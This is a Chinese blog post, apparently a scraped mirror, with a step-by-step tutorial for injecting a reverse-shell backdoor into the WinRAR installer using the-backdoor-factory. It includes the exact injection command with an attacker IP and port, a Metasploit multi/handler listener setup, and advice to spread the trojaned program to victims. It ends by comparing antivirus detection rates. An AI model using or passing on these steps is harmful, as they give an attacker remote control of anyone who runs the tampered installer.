zoukankan      html  css  js  c++  java
  • 后门

    我们的网络不安全
    https://www.youtube.com/watch?v=nJF9OTscFiQ

    这次我们用到的程序叫backdoor-factory,为完整的程序注入后门程序。具体的请网上查看。

    在kali linux系统上集成了该程序,但是注入后的程序显示为空文件(大小为0).故在ubuntu上手动安装尝试了一下,看我们的网络是否够安全。

    注入

    1.下载程序

    git clone https://github.com/secretsquirrel/the-backdoor-factory.git
    

    2.安装

    sudo chmod +x ./install.sh
    

    3.运行

    sudo ./backdoor.py
    

    4.选择目标文件

    本次使用的软件为 https://rarlab.com/rar/winrar-x64-561.exe
    之后将在此程序中注入后门

    执行 ./babackdoor.py -f winrar-x64-561.exe -S
    可以看到此程序支持代码注入

    执行 ./babackdoor.py -f winrar-x64-561.exe -s show 查看支持哪几种注入方式

    5.开始注入

    执行 ./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234

    reverse_shell_tcp_inline 注入方式
    172.17.170.38 攻击者ip,之后受害者主机来访问该ip
    1234 攻击者端口,之后受害者主机来访问该端口

    选择注入的位置:


    都可以,这里我们选择2

    完成。可以在指定目录下找到该文件。
    到这里就注入完成了。

    控制

    服务器等待中招的pc连接。
    设置服务器。打开kali linux系统。

    #msfconsole
    msf> use multi/handler
    msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
    msf exploit(handler) > set LPORT 1234
    msf exploit(handler) > set LHOST 172.17.170.38
    msf exploit(handler) > exploit
    

    将注入好的程序散发出去。如果有计算机不幸中招。
    当有中招的pc代开注入后门的程序后,服务器端会有响应。

    可以看到172.17.172.223连入服务器。这时候,你就可以全权控制223这台主机了。

    可以看到被控制的主机信息。(编码格式可能不对,出现乱码)

    测试

    对于注入后门程序的程序,会不会成功被检测到呢。我用的火绒杀毒,双击之后立马报警。

    对于其他杀毒软件看看什么情况,可以看到能够查杀到此后门的杀毒软件并不多。

    实际上,该程序官网下载的源文件也可能会被误杀


    杀毒可以参考网站:
    http://www.virscan.org/language/zh-cn/
    https://www.virustotal.com/zh-cn/

    参考

    利用BDF向EXE文件植入后门

    Backdoor factory – How to inject shell-code into windows application

    Kali Linux 渗透测试 博客记录

  • 相关阅读:
    Shell-17--break-exit-continue-shift
    Shell-16--函数
    Shell-14--awk
    TCP带外数据读写
    Linux网络编程-----Socket地址API
    log4j日志级别
    JNI-Test
    游戏服务器当中的唯一名设计方法
    String和bytes的编码转换
    base64的一个应用情景
  • 原文地址:https://www.cnblogs.com/maskerk/p/10208111.html
Copyright © 2011-2022 走看看